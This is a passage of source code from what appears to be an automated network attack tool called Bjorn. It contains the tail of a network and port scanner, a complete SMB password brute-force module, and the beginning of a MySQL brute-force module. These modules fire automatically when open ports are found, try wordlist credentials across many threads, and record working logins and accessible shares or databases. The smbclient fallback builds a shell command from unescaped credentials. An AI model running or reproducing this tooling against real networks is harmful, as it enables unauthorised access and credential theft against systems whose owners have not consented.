self.ip_data.ip_list.append(ip)
|
||||
self.ip_data.hostname_list.append(hostname)
|
||||
self.ip_data.mac_list.append(mac)
|
||||
|
||||
def scan_host(self, ip):
|
||||
if self.outer.shared_data.orchestrator_should_exit:
|
||||
return
|
||||
if self.outer.blacklistcheck and ip in self.outer.ip_scan_blacklist:
|
||||
return
|
||||
try:
|
||||
# ARP ping to help populate neighbor cache
|
||||
os.system(f"arping -c 2 -w 2 {ip} > /dev/null 2>&1")
|
||||
|
||||
# Hostname (validated)
|
||||
hostname = ""
|
||||
try:
|
||||
hostname = self.outer.nm[ip].hostname()
|
||||
except Exception:
|
||||
pass
|
||||
hostname = self.outer.validate_hostname(ip, hostname)
|
||||
|
||||
if self.outer.blacklistcheck and hostname and hostname in self.outer.hostname_scan_blacklist:
|
||||
self.outer.update_progress('host', 1)
|
||||
return
|
||||
|
||||
time.sleep(1.0) # let ARP breathe
|
||||
|
||||
mac = self.outer.get_mac_address(ip, hostname)
|
||||
if mac:
|
||||
mac = mac.lower()
|
||||
|
||||
if self.outer.blacklistcheck and mac in self.outer.mac_scan_blacklist:
|
||||
self.outer.update_progress('host', 1)
|
||||
return
|
||||
|
||||
if not mac:
|
||||
# No MAC -> keep it in-memory only (no DB writes)
|
||||
slot = self.pending.setdefault(
|
||||
ip,
|
||||
{'hostnames': set(), 'ports': set(), 'first_seen': int(time.time()), 'essid': self.essid}
|
||||
)
|
||||
if hostname:
|
||||
slot['hostnames'].add(hostname)
|
||||
self.outer.logger.debug(f"Pending (no MAC yet): {ip} hostname={hostname or '-'}")
|
||||
else:
|
||||
# MAC found -> write/update in DB
|
||||
self.seen_now.add(mac)
|
||||
vendor = self.outer.mac_to_vendor(mac, self.vendor_map)
|
||||
|
||||
prev = self.existing_map.get(mac)
|
||||
ips_set, hosts_set, ports_set = set(), set(), set()
|
||||
|
||||
if prev:
|
||||
if prev.get('ips'):
|
||||
ips_set.update(p for p in prev['ips'].split(';') if p)
|
||||
if prev.get('hostnames'):
|
||||
hosts_set.update(h for h in prev['hostnames'].split(';') if h)
|
||||
if prev.get('ports'):
|
||||
ports_set.update(p for p in prev['ports'].split(';') if p)
|
||||
|
||||
if ip:
|
||||
ips_set.add(ip)
|
||||
|
||||
# Update current hostname + track history
|
||||
current_hn = ""
|
||||
if hostname:
|
||||
self.outer.shared_data.db.update_hostname(mac, hostname)
|
||||
current_hn = hostname
|
||||
else:
|
||||
current_hn = (prev.get('hostnames') or "").split(';', 1)[0] if prev else ""
|
||||
|
||||
ips_sorted = ';'.join(sorted(
|
||||
ips_set,
|
||||
key=lambda x: tuple(map(int, x.split('.'))) if x.count('.') == 3 else (0, 0, 0, 0)
|
||||
)) if ips_set else None
|
||||
|
||||
self.outer.shared_data.db.update_host(
|
||||
mac_address=mac,
|
||||
ips=ips_sorted,
|
||||
hostnames=None,
|
||||
alive=1,
|
||||
ports=None,
|
||||
vendor=vendor or (prev.get('vendor') if prev else ""),
|
||||
essid=self.essid or (prev.get('essid') if prev else None)
|
||||
)
|
||||
|
||||
# refresh local cache
|
||||
self.existing_map[mac] = dict(
|
||||
mac_address=mac,
|
||||
ips=ips_sorted or (prev.get('ips') if prev else ""),
|
||||
hostnames=current_hn or (prev.get('hostnames') if prev else ""),
|
||||
alive=1,
|
||||
ports=';'.join(sorted(ports_set)) if ports_set else (prev.get('ports') if prev else ""),
|
||||
vendor=vendor or (prev.get('vendor') if prev else ""),
|
||||
essid=self.essid or (prev.get('essid') if prev else "")
|
||||
)
|
||||
|
||||
with self.outer.lock:
|
||||
self.ip_hostname_list.append((ip, hostname or "", mac))
|
||||
self.outer.logger.debug(f"MAC for {ip}: {mac} (hostname: {hostname or '-'})")
|
||||
|
||||
except Exception as e:
|
||||
self.outer.logger.error(f"Error scanning host {ip}: {e}")
|
||||
finally:
|
||||
self.outer.update_progress('host', 1)
|
||||
time.sleep(0.05)
|
||||
|
||||
def start(self):
|
||||
if self.outer.shared_data.orchestrator_should_exit:
|
||||
return
|
||||
self.scan_network_and_collect()
|
||||
if self.outer.shared_data.orchestrator_should_exit:
|
||||
return
|
||||
|
||||
# init structures for ports
|
||||
self.open_ports = {ip: [] for ip in self.ip_data.ip_list}
|
||||
|
||||
# port-scan summary
|
||||
total_targets = len(self.ip_data.ip_list)
|
||||
range_size = max(0, self.portend - self.portstart)
|
||||
self.outer.total_ports = total_targets * (range_size + len(self.extra_ports))
|
||||
self.outer.scanned_ports = 0
|
||||
self.outer.update_progress('port', 0)
|
||||
self.outer.logger.info(
|
||||
f"Port scan: {total_targets} host(s), range {self.portstart}-{self.portend-1} "
|
||||
f"(+{len(self.extra_ports)} extra)"
|
||||
)
|
||||
|
||||
# per-IP port scan (threads per port, original logic)
|
||||
for idx, ip in enumerate(self.ip_data.ip_list, 1):
|
||||
if self.outer.shared_data.orchestrator_should_exit:
|
||||
return
|
||||
worker = self.outer.PortScannerWorker(self.outer, ip, self.open_ports, self.portstart, self.portend, self.extra_ports)
|
||||
worker.run()
|
||||
if idx % 10 == 0 or idx == total_targets:
|
||||
found = sum(len(v) for v in self.open_ports.values())
|
||||
self.outer.logger.info(
|
||||
f"Port scan progress: {idx}/{total_targets} hosts, {found} open ports so far"
|
||||
)
|
||||
|
||||
# unique list of open ports
|
||||
self.all_ports = sorted(list({p for plist in self.open_ports.values() for p in plist}))
|
||||
alive_macs = set(self.ip_data.mac_list)
|
||||
total_open = sum(len(v) for v in self.open_ports.values())
|
||||
self.outer.logger.info(f"Port scan done: {total_open} open ports across {total_targets} host(s)")
|
||||
return self.ip_data, self.open_ports, self.all_ports, alive_macs
|
||||
|
||||
# ---------- orchestration ----------
|
||||
def scan(self):
|
||||
self.shared_data.orchestrator_should_exit = False
|
||||
try:
|
||||
if self.shared_data.orchestrator_should_exit:
|
||||
self.logger.info("Orchestrator switched to manual mode. Stopping scanner.")
|
||||
return
|
||||
|
||||
self.shared_data.bjorn_orch_status = "NetworkScanner"
|
||||
self.logger.info("Starting Network Scanner")
|
||||
|
||||
# network
|
||||
network = self.get_network() if not self.shared_data.use_custom_network \
|
||||
else ipaddress.ip_network(self.shared_data.custom_network, strict=False)
|
||||
|
||||
if network is None:
|
||||
self.logger.error("No network available. Aborting scan.")
|
||||
return
|
||||
|
||||
self.shared_data.bjorn_status_text2 = str(network)
|
||||
portstart = int(self.shared_data.portstart)
|
||||
portend = int(self.shared_data.portend)
|
||||
extra_ports = self.shared_data.portlist
|
||||
|
||||
scanner = self.ScanPorts(self, network, portstart, portend, extra_ports)
|
||||
result = scanner.start()
|
||||
if result is None:
|
||||
self.logger.info("Scan interrupted (manual mode).")
|
||||
return
|
||||
|
||||
ip_data, open_ports_by_ip, all_ports, alive_macs = result
|
||||
|
||||
if self.shared_data.orchestrator_should_exit:
|
||||
self.logger.info("Scan canceled before DB finalization.")
|
||||
return
|
||||
|
||||
# push ports -> DB (merge by MAC). Only for IPs with known MAC.
|
||||
# map ip->mac
|
||||
ip_to_mac = {ip: mac for ip, _, mac in zip(ip_data.ip_list, ip_data.hostname_list, ip_data.mac_list)}
|
||||
|
||||
# existing cache
|
||||
existing_map = {h['mac_address']: h for h in self.shared_data.db.get_all_hosts()}
|
||||
|
||||
for ip, ports in open_ports_by_ip.items():
|
||||
mac = ip_to_mac.get(ip)
|
||||
if not mac:
|
||||
# store to pending (no DB write)
|
||||
slot = scanner.pending.setdefault(
|
||||
ip,
|
||||
{'hostnames': set(), 'ports': set(), 'first_seen': int(time.time()), 'essid': scanner.essid}
|
||||
)
|
||||
slot['ports'].update(ports or [])
|
||||
continue
|
||||
|
||||
prev = existing_map.get(mac)
|
||||
ports_set = set()
|
||||
if prev and prev.get('ports'):
|
||||
try:
|
||||
ports_set.update([p for p in prev['ports'].split(';') if p])
|
||||
except Exception:
|
||||
pass
|
||||
ports_set.update(str(p) for p in (ports or []))
|
||||
|
||||
self.shared_data.db.update_host(
|
||||
mac_address=mac,
|
||||
ports=';'.join(sorted(ports_set, key=lambda x: int(x))),
|
||||
alive=1
|
||||
)
|
||||
|
||||
# Late resolution pass: try to resolve pending IPs before stats
|
||||
unresolved_before = len(scanner.pending)
|
||||
for ip, data in list(scanner.pending.items()):
|
||||
if self.shared_data.orchestrator_should_exit:
|
||||
break
|
||||
try:
|
||||
guess_hostname = next(iter(data['hostnames']), "")
|
||||
except Exception:
|
||||
guess_hostname = ""
|
||||
mac = self.get_mac_address(ip, guess_hostname)
|
||||
if not mac:
|
||||
continue # still unresolved for this run
|
||||
|
||||
mac = mac.lower()
|
||||
vendor = self.mac_to_vendor(mac, scanner.vendor_map)
|
||||
# create/update host now
|
||||
self.shared_data.db.update_host(
|
||||
mac_address=mac,
|
||||
ips=ip,
|
||||
hostnames=';'.join(data['hostnames']) or None,
|
||||
vendor=vendor,
|
||||
essid=data.get('essid'),
|
||||
alive=1
|
||||
)
|
||||
if data['ports']:
|
||||
self.shared_data.db.update_host(
|
||||
mac_address=mac,
|
||||
ports=';'.join(str(p) for p in sorted(data['ports'], key=int)),
|
||||
alive=1
|
||||
)
|
||||
del scanner.pending[ip]
|
||||
|
||||
if scanner.pending:
|
||||
self.logger.info(
|
||||
f"Unresolved IPs (kept in-memory only this run): {len(scanner.pending)} "
|
||||
f"(resolved during late pass: {unresolved_before - len(scanner.pending)})"
|
||||
)
|
||||
|
||||
# stats (alive, total ports, distinct vulnerabilities on alive)
|
||||
rows = self.shared_data.db.get_all_hosts()
|
||||
alive_hosts = [r for r in rows if int(r.get('alive') or 0) == 1]
|
||||
all_known = len(rows)
|
||||
|
||||
total_open_ports = 0
|
||||
for r in alive_hosts:
|
||||
ports_txt = r.get('ports') or ""
|
||||
if ports_txt:
|
||||
try:
|
||||
total_open_ports += len([p for p in ports_txt.split(';') if p])
|
||||
except Exception:
|
||||
pass
|
||||
|
||||
try:
|
||||
vulnerabilities_count = self.shared_data.db.count_distinct_vulnerabilities(alive_only=True)
|
||||
except Exception:
|
||||
vulnerabilities_count = 0
|
||||
|
||||
self.shared_data.db.set_stats(
|
||||
total_open_ports=total_open_ports,
|
||||
alive_hosts_count=len(alive_hosts),
|
||||
all_known_hosts_count=all_known,
|
||||
vulnerabilities_count=int(vulnerabilities_count)
|
||||
)
|
||||
|
||||
# WAL checkpoint + optimize
|
||||
try:
|
||||
if hasattr(self.shared_data, "db") and hasattr(self.shared_data.db, "execute"):
|
||||
self.shared_data.db.execute("PRAGMA wal_checkpoint(TRUNCATE);")
|
||||
self.shared_data.db.execute("PRAGMA optimize;")
|
||||
self.logger.debug("WAL checkpoint TRUNCATE + PRAGMA optimize executed.")
|
||||
except Exception as e:
|
||||
self.logger.debug(f"Checkpoint/optimize skipped or failed: {e}")
|
||||
|
||||
self.shared_data.bjorn_progress = ""
|
||||
self.logger.info("Network scan complete (DB updated).")
|
||||
|
||||
except Exception as e:
|
||||
if self.shared_data.orchestrator_should_exit:
|
||||
self.logger.info("Orchestrator switched to manual mode. Gracefully stopping the network scanner.")
|
||||
else:
|
||||
self.logger.error(f"Error in scan: {e}")
|
||||
finally:
|
||||
with self.lock:
|
||||
self.shared_data.bjorn_progress = ""
|
||||
|
||||
# ---------- thread wrapper ----------
|
||||
def start(self):
|
||||
if not self.running:
|
||||
self.running = True
|
||||
self.thread = threading.Thread(target=self.scan_wrapper, daemon=True)
|
||||
self.thread.start()
|
||||
logger.info("NetworkScanner started.")
|
||||
|
||||
def scan_wrapper(self):
|
||||
try:
|
||||
self.scan()
|
||||
finally:
|
||||
with self.lock:
|
||||
self.shared_data.bjorn_progress = ""
|
||||
logger.debug("bjorn_progress reset to empty string")
|
||||
|
||||
def stop(self):
|
||||
if self.running:
|
||||
self.running = False
|
||||
self.shared_data.orchestrator_should_exit = True
|
||||
try:
|
||||
if hasattr(self, "thread") and self.thread.is_alive():
|
||||
self.thread.join()
|
||||
except Exception:
|
||||
pass
|
||||
logger.info("NetworkScanner stopped.")
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
# SharedData must provide .db (BjornDatabase) and fields:
|
||||
# default_network_interface, use_custom_network, custom_network,
|
||||
# portstart, portend, portlist, blacklistcheck, mac/ip/hostname blacklists,
|
||||
# bjorn_progress, bjorn_orch_status, bjorn_status_text2, orchestrator_should_exit.
|
||||
from shared import SharedData
|
||||
sd = SharedData()
|
||||
scanner = NetworkScanner(sd)
|
||||
scanner.scan()
|
||||
331
resources/default_config/actions/smb_bruteforce.py
Normal file
@@ -0,0 +1,331 @@
|
||||
"""
|
||||
smb_bruteforce.py — SMB bruteforce (DB-backed, no CSV/JSON, no rich)
|
||||
- Cibles fournies par l’orchestrateur (ip, port)
|
||||
- IP -> (MAC, hostname) depuis DB.hosts
|
||||
- Succès enregistrés dans DB.creds (service='smb'), 1 ligne PAR PARTAGE (database=<share>)
|
||||
- Conserve la logique de queue/threads et les signatures. Plus de rich/progress.
|
||||
"""
|
||||
|
||||
import os
|
||||
import threading
|
||||
import logging
|
||||
import time
|
||||
from subprocess import Popen, PIPE
|
||||
from smb.SMBConnection import SMBConnection
|
||||
from queue import Queue
|
||||
from typing import List, Dict, Tuple, Optional
|
||||
|
||||
from shared import SharedData
|
||||
from logger import Logger
|
||||
|
||||
logger = Logger(name="smb_bruteforce.py", level=logging.DEBUG)
|
||||
|
||||
b_class = "SMBBruteforce"
|
||||
b_module = "smb_bruteforce"
|
||||
b_status = "brute_force_smb"
|
||||
b_port = 445
|
||||
b_parent = None
|
||||
b_service = '["smb"]'
|
||||
b_trigger = 'on_any:["on_service:smb","on_new_port:445"]'
|
||||
b_priority = 70
|
||||
b_cooldown = 1800 # 30 minutes entre deux runs
|
||||
b_rate_limit = '3/86400' # 3 fois par jour max
|
||||
|
||||
IGNORED_SHARES = {'print$', 'ADMIN$', 'IPC$', 'C$', 'D$', 'E$', 'F$'}
|
||||
|
||||
|
||||
class SMBBruteforce:
|
||||
"""Wrapper orchestrateur -> SMBConnector."""
|
||||
|
||||
def __init__(self, shared_data):
|
||||
self.shared_data = shared_data
|
||||
self.smb_bruteforce = SMBConnector(shared_data)
|
||||
logger.info("SMBConnector initialized.")
|
||||
|
||||
def bruteforce_smb(self, ip, port):
|
||||
"""Lance le bruteforce SMB pour (ip, port)."""
|
||||
return self.smb_bruteforce.run_bruteforce(ip, port)
|
||||
|
||||
def execute(self, ip, port, row, status_key):
|
||||
"""Point d’entrée orchestrateur (retour 'success' / 'failed')."""
|
||||
self.shared_data.bjorn_orch_status = "SMBBruteforce"
|
||||
success, results = self.bruteforce_smb(ip, port)
|
||||
return 'success' if success else 'failed'
|
||||
|
||||
|
||||
class SMBConnector:
|
||||
"""Gère les tentatives SMB, la persistance DB et le mapping IP→(MAC, Hostname)."""
|
||||
|
||||
def __init__(self, shared_data):
|
||||
self.shared_data = shared_data
|
||||
|
||||
# Wordlists inchangées
|
||||
self.users = self._read_lines(shared_data.users_file)
|
||||
self.passwords = self._read_lines(shared_data.passwords_file)
|
||||
|
||||
# Cache IP -> (mac, hostname)
|
||||
self._ip_to_identity: Dict[str, Tuple[Optional[str], Optional[str]]] = {}
|
||||
self._refresh_ip_identity_cache()
|
||||
|
||||
self.lock = threading.Lock()
|
||||
self.results: List[List[str]] = [] # [mac, ip, hostname, share, user, password, port]
|
||||
self.queue = Queue()
|
||||
|
||||
# ---------- util fichiers ----------
|
||||
@staticmethod
|
||||
def _read_lines(path: str) -> List[str]:
|
||||
try:
|
||||
with open(path, "r", encoding="utf-8", errors="ignore") as f:
|
||||
return [l.rstrip("\n\r") for l in f if l.strip()]
|
||||
except Exception as e:
|
||||
logger.error(f"Cannot read file {path}: {e}")
|
||||
return []
|
||||
|
||||
# ---------- mapping DB hosts ----------
|
||||
def _refresh_ip_identity_cache(self) -> None:
|
||||
self._ip_to_identity.clear()
|
||||
try:
|
||||
rows = self.shared_data.db.get_all_hosts()
|
||||
except Exception as e:
|
||||
logger.error(f"DB get_all_hosts failed: {e}")
|
||||
rows = []
|
||||
|
||||
for r in rows:
|
||||
mac = r.get("mac_address") or ""
|
||||
if not mac:
|
||||
continue
|
||||
hostnames_txt = r.get("hostnames") or ""
|
||||
current_hn = hostnames_txt.split(';', 1)[0] if hostnames_txt else ""
|
||||
ips_txt = r.get("ips") or ""
|
||||
if not ips_txt:
|
||||
continue
|
||||
for ip in [p.strip() for p in ips_txt.split(';') if p.strip()]:
|
||||
self._ip_to_identity[ip] = (mac, current_hn)
|
||||
|
||||
def mac_for_ip(self, ip: str) -> Optional[str]:
|
||||
if ip not in self._ip_to_identity:
|
||||
self._refresh_ip_identity_cache()
|
||||
return self._ip_to_identity.get(ip, (None, None))[0]
|
||||
|
||||
def hostname_for_ip(self, ip: str) -> Optional[str]:
|
||||
if ip not in self._ip_to_identity:
|
||||
self._refresh_ip_identity_cache()
|
||||
return self._ip_to_identity.get(ip, (None, None))[1]
|
||||
|
||||
# ---------- SMB ----------
|
||||
def smb_connect(self, adresse_ip: str, user: str, password: str) -> List[str]:
|
||||
conn = SMBConnection(user, password, "Bjorn", "Target", use_ntlm_v2=True)
|
||||
try:
|
||||
conn.connect(adresse_ip, 445)
|
||||
shares = conn.listShares()
|
||||
accessible = []
|
||||
for share in shares:
|
||||
if share.isSpecial or share.isTemporary or share.name in IGNORED_SHARES:
|
||||
continue
|
||||
try:
|
||||
conn.listPath(share.name, '/')
|
||||
accessible.append(share.name)
|
||||
logger.info(f"Access to share {share.name} successful on {adresse_ip} with user '{user}'")
|
||||
except Exception as e:
|
||||
logger.error(f"Error accessing share {share.name} on {adresse_ip} with user '{user}': {e}")
|
||||
try:
|
||||
conn.close()
|
||||
except Exception:
|
||||
pass
|
||||
return accessible
|
||||
except Exception:
|
||||
return []
|
||||
|
||||
def smbclient_l(self, adresse_ip: str, user: str, password: str) -> List[str]:
|
||||
cmd = f'smbclient -L {adresse_ip} -U {user}%{password}'
|
||||
try:
|
||||
process = Popen(cmd, shell=True, stdout=PIPE, stderr=PIPE)
|
||||
stdout, stderr = process.communicate()
|
||||
if b"Sharename" in stdout:
|
||||
logger.info(f"Successful auth for {adresse_ip} with '{user}' using smbclient -L")
|
||||
return self.parse_shares(stdout.decode(errors="ignore"))
|
||||
else:
|
||||
logger.info(f"Trying smbclient -L for {adresse_ip} with user '{user}'")
|
||||
return []
|
||||
except Exception as e:
|
||||
logger.error(f"Error executing '{cmd}': {e}")
|
||||
return []
|
||||
|
||||
@staticmethod
|
||||
def parse_shares(smbclient_output: str) -> List[str]:
|
||||
shares = []
|
||||
for line in smbclient_output.splitlines():
|
||||
if line.strip() and not line.startswith("Sharename") and not line.startswith("---------"):
|
||||
parts = line.split()
|
||||
if parts:
|
||||
name = parts[0]
|
||||
if name not in IGNORED_SHARES:
|
||||
shares.append(name)
|
||||
return shares
|
||||
|
||||
# ---------- DB upsert fallback ----------
|
||||
def _fallback_upsert_cred(self, *, mac, ip, hostname, user, password, port, database=None):
|
||||
mac_k = mac or ""
|
||||
ip_k = ip or ""
|
||||
user_k = user or ""
|
||||
db_k = database or ""
|
||||
port_k = int(port or 0)
|
||||
|
||||
try:
|
||||
with self.shared_data.db.transaction(immediate=True):
|
||||
self.shared_data.db.execute(
|
||||
"""
|
||||
INSERT OR IGNORE INTO creds(service,mac_address,ip,hostname,"user","password",port,"database",extra)
|
||||
VALUES('smb',?,?,?,?,?,?,?,NULL)
|
||||
""",
|
||||
(mac_k, ip_k, hostname or "", user_k, password or "", port_k, db_k),
|
||||
)
|
||||
self.shared_data.db.execute(
|
||||
"""
|
||||
UPDATE creds
|
||||
SET "password"=?,
|
||||
hostname=COALESCE(?, hostname),
|
||||
last_seen=CURRENT_TIMESTAMP
|
||||
WHERE service='smb'
|
||||
AND COALESCE(mac_address,'')=?
|
||||
AND COALESCE(ip,'')=?
|
||||
AND COALESCE("user",'')=?
|
||||
AND COALESCE(COALESCE("database",""),'')=?
|
||||
AND COALESCE(port,0)=?
|
||||
""",
|
||||
(password or "", hostname or None, mac_k, ip_k, user_k, db_k, port_k),
|
||||
)
|
||||
except Exception as e:
|
||||
logger.error(f"fallback upsert_cred failed for {ip} {user}: {e}")
|
||||
|
||||
# ---------- worker / queue ----------
|
||||
def worker(self, success_flag):
|
||||
"""Worker thread for SMB bruteforce attempts."""
|
||||
while not self.queue.empty():
|
||||
if self.shared_data.orchestrator_should_exit:
|
||||
logger.info("Orchestrator exit signal received, stopping worker thread.")
|
||||
break
|
||||
|
||||
adresse_ip, user, password, mac_address, hostname, port = self.queue.get()
|
||||
try:
|
||||
shares = self.smb_connect(adresse_ip, user, password)
|
||||
if shares:
|
||||
with self.lock:
|
||||
for share in shares:
|
||||
if share in IGNORED_SHARES:
|
||||
continue
|
||||
self.results.append([mac_address, adresse_ip, hostname, share, user, password, port])
|
||||
logger.success(f"Found credentials IP:{adresse_ip} | User:{user} | Share:{share}")
|
||||
self.save_results()
|
||||
self.removeduplicates()
|
||||
success_flag[0] = True
|
||||
finally:
|
||||
self.queue.task_done()
|
||||
|
||||
# Optional delay between attempts
|
||||
if getattr(self.shared_data, "timewait_smb", 0) > 0:
|
||||
time.sleep(self.shared_data.timewait_smb)
|
||||
|
||||
|
||||
def run_bruteforce(self, adresse_ip: str, port: int):
|
||||
mac_address = self.mac_for_ip(adresse_ip)
|
||||
hostname = self.hostname_for_ip(adresse_ip) or ""
|
||||
|
||||
total_tasks = len(self.users) * len(self.passwords)
|
||||
if total_tasks == 0:
|
||||
logger.warning("No users/passwords loaded. Abort.")
|
||||
return False, []
|
||||
|
||||
for user in self.users:
|
||||
for password in self.passwords:
|
||||
if self.shared_data.orchestrator_should_exit:
|
||||
logger.info("Orchestrator exit signal received, stopping bruteforce task addition.")
|
||||
return False, []
|
||||
self.queue.put((adresse_ip, user, password, mac_address, hostname, port))
|
||||
|
||||
success_flag = [False]
|
||||
threads = []
|
||||
thread_count = min(40, max(1, total_tasks))
|
||||
|
||||
for _ in range(thread_count):
|
||||
t = threading.Thread(target=self.worker, args=(success_flag,), daemon=True)
|
||||
t.start()
|
||||
threads.append(t)
|
||||
|
||||
while not self.queue.empty():
|
||||
if self.shared_data.orchestrator_should_exit:
|
||||
logger.info("Orchestrator exit signal received, stopping bruteforce.")
|
||||
while not self.queue.empty():
|
||||
try:
|
||||
self.queue.get_nowait()
|
||||
self.queue.task_done()
|
||||
except Exception:
|
||||
break
|
||||
break
|
||||
|
||||
self.queue.join()
|
||||
for t in threads:
|
||||
t.join()
|
||||
|
||||
# Fallback smbclient -L si rien trouvé
|
||||
if not success_flag[0]:
|
||||
logger.info(f"No success via SMBConnection. Trying smbclient -L for {adresse_ip}")
|
||||
for user in self.users:
|
||||
for password in self.passwords:
|
||||
shares = self.smbclient_l(adresse_ip, user, password)
|
||||
if shares:
|
||||
with self.lock:
|
||||
for share in shares:
|
||||
if share in IGNORED_SHARES:
|
||||
continue
|
||||
self.results.append([mac_address, adresse_ip, hostname, share, user, password, port])
|
||||
logger.success(f"(SMB) Found credentials IP:{adresse_ip} | User:{user} | Share:{share} via smbclient -L")
|
||||
self.save_results()
|
||||
self.removeduplicates()
|
||||
success_flag[0] = True
|
||||
if getattr(self.shared_data, "timewait_smb", 0) > 0:
|
||||
time.sleep(self.shared_data.timewait_smb)
|
||||
|
||||
return success_flag[0], self.results
|
||||
|
||||
# ---------- persistence DB ----------
|
||||
def save_results(self):
|
||||
# insère self.results dans creds (service='smb'), database = <share>
|
||||
for mac, ip, hostname, share, user, password, port in self.results:
|
||||
try:
|
||||
self.shared_data.db.insert_cred(
|
||||
service="smb",
|
||||
mac=mac,
|
||||
ip=ip,
|
||||
hostname=hostname,
|
||||
user=user,
|
||||
password=password,
|
||||
port=port,
|
||||
database=share, # utilise la colonne 'database' pour distinguer les shares
|
||||
extra=None
|
||||
)
|
||||
except Exception as e:
|
||||
if "ON CONFLICT clause does not match" in str(e):
|
||||
self._fallback_upsert_cred(
|
||||
mac=mac, ip=ip, hostname=hostname, user=user,
|
||||
password=password, port=port, database=share
|
||||
)
|
||||
else:
|
||||
logger.error(f"insert_cred failed for {ip} {user} share={share}: {e}")
|
||||
self.results = []
|
||||
|
||||
def removeduplicates(self):
|
||||
# plus nécessaire avec l'index unique; conservé pour compat.
|
||||
pass
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
# Mode autonome non utilisé en prod; on laisse simple
|
||||
try:
|
||||
sd = SharedData()
|
||||
smb_bruteforce = SMBBruteforce(sd)
|
||||
logger.info("SMB brute force module ready.")
|
||||
exit(0)
|
||||
except Exception as e:
|
||||
logger.error(f"Error: {e}")
|
||||
exit(1)
|
||||
284
resources/default_config/actions/sql_bruteforce.py
Normal file
@@ -0,0 +1,284 @@
|
||||
"""
|
||||
sql_bruteforce.py — MySQL bruteforce (DB-backed, no CSV/JSON, no rich)
|
||||
- Cibles: (ip, port) par l’orchestrateur
|
||||
- IP -> (MAC, hostname) via DB.hosts
|
||||
- Connexion sans DB puis SHOW DATABASES; une entrée par DB trouvée
|
||||
- Succès -> DB.creds (service='sql', database=<db>)
|
||||
- Conserve la logique (pymysql, queue/threads)
|
||||
"""
|
||||
|
||||
import os
|
||||
import pymysql
|
||||
import threading
|
||||
import logging
|
||||
import time
|
||||
from queue import Queue
|
||||
from typing import List, Dict, Tuple, Optional
|
||||
|
||||
from shared import SharedData
|
||||
from logger import Logger
|
||||
|
||||
logger = Logger(name="sql_bruteforce.py", level=logging.DEBUG)
|
||||
|
||||
b_class = "SQLBruteforce"
|
||||
b_module = "sql_bruteforce"
|
||||
b_status = "brute_force_sql"
|
||||
b_port = 3306
|
||||
b_parent = None
|
||||
b_service = '["sql"]'
|
||||
b_trigger = 'on_any:["on_service:sql","on_new_port:3306"]'
|
||||
b_priority = 70
|
||||
b_cooldown = 1800 # 30 minutes entre deux runs
|
||||
b_rate_limit = '3/86400' # 3 fois par jour max
|
||||
|
||||
class SQLBruteforce:
|
||||
"""Wrapper orchestrateur -> SQLConnector."""
|
||||
|
||||
def __init__(self, shared_data):
|
||||
self.shared_data = shared_data
|
||||
self.sql_bruteforce = SQLConnector(shared_data)
|
||||
logger.info("SQLConnector initialized.")
|
||||
|
||||
def bruteforce_sql(self, ip, port):
|
||||
"""Lance le bruteforce SQL pour (ip, port)."""
|
||||
return self.sql_bruteforce.run_bruteforce(ip, port)
|
||||
|
||||
def execute(self, ip, port, row, status_key):
|
||||
"""Point d’entrée orchestrateur (retour 'success' / 'failed')."""
|
||||
success, results = self.bruteforce_sql(ip, port)
|
||||
return 'success' if success else 'failed'
|
||||
|
||||
|
||||
class SQLConnector:
|
||||
"""Gère les tentatives SQL (MySQL), persistance DB, mapping IP→(MAC, Hostname)."""
|
||||
|
||||
def __init__(self, shared_data):
|
||||
self.shared_data = shared_data
|
||||
|
||||
# Wordlists inchangées
|
||||
self.users = self._read_lines(shared_data.users_file)
|
||||
self.passwords = self._read_lines(shared_data.passwords_file)
|
||||
|
||||
# Cache IP -> (mac, hostname)
|
||||
self._ip_to_identity: Dict[str, Tuple[Optional[str], Optional[str]]] = {}
|
||||
self._refresh_ip_identity_cache()
|
||||
|
||||
self.lock = threading.Lock()
|
||||
self.results: List[List[str]] = [] # [ip, user, password, port, database, mac, hostname]
|
||||
self.queue = Queue()
|
||||
|
||||
# ---------- util fichiers ----------
|
||||
@staticmethod
|
||||
def _read_lines(path: str) -> List[str]:
|
||||
try:
|
||||
with open(path, "r", encoding="utf-8", errors="ignore") as f:
|
||||
return [l.rstrip("\n\r") for l in f if l.strip()]
|
||||
except Exception as e:
|
||||
logger.error(f"Cannot read file {path}: {e}")
|
||||
return []
|
||||
|
||||
# ---------- mapping DB hosts ----------
|
||||
def _refresh_ip_identity_cache(self) -> None:
|
||||
self._ip_to_identity.clear()
|
||||
try:
|
||||
rows = self.shared_data.db.get_all_hosts()
|
||||
except Exception as e:
|
||||
logger.error(f"DB get_all_hosts failed: {e}")
|
||||
rows = []
|
||||
|
||||
for r in rows:
|
||||
mac = r.get("mac_address") or ""
|
||||
if not mac:
|
||||
continue
|
||||
hostnames_txt = r.get("hostnames") or ""
|
||||
current_hn = hostnames_txt.split(';', 1)[0] if hostnames_txt else ""
|
||||
ips_txt = r.get("ips") or ""
|
||||
if not ips_txt:
|
||||
continue
|
||||
for ip in [p.strip() for p in ips_txt.split(';') if p.strip()]:
|
||||
self._ip_to_identity[ip] = (mac, current_hn)
|
||||
|
||||
def mac_for_ip(self, ip: str) -> Optional[str]:
|
||||
if ip not in self._ip_to_identity:
|
||||
self._refresh_ip_identity_cache()
|
||||
return self._ip_to_identity.get(ip, (None, None))[0]
|
||||
|
||||
def hostname_for_ip(self, ip: str) -> Optional[str]:
|
||||
if ip not in self._ip_to_identity:
|
||||
self._refresh_ip_identity_cache()
|
||||
return self._ip_to_identity.get(ip, (None, None))[1]
|
||||
|
||||
# ---------- SQL ----------
|
||||
def sql_connect(self, adresse_ip: str, user: str, password: str):
|
||||
"""
|
||||
Connexion sans DB puis SHOW DATABASES; retourne (True, [dbs]) ou (False, []).
|
||||
"""
|
||||
try:
|
||||
conn = pymysql.connect(
|
||||
host=adresse_ip,
|
||||
user=user,
|
||||
password=password,
|
||||
port=3306
|
||||
)
|
||||
try:
|
||||
with conn.cursor() as cursor:
|
||||
cursor.execute("SHOW DATABASES")
|
||||
databases = [db[0] for db in cursor.fetchall()]
|
||||
finally:
|
||||
try:
|
||||
conn.close()
|
||||
except Exception:
|
||||
pass
|
||||
|
||||
logger.info(f"Successfully connected to {adresse_ip} with user {user}")
|
||||
logger.info(f"Available databases: {', '.join(databases)}")
|
||||
return True, databases
|
||||
except pymysql.Error as e:
|
||||
logger.error(f"Failed to connect to {adresse_ip} with user {user}: {e}")
|
||||
return False, []
|
||||
|
||||
# ---------- DB upsert fallback ----------
|
||||
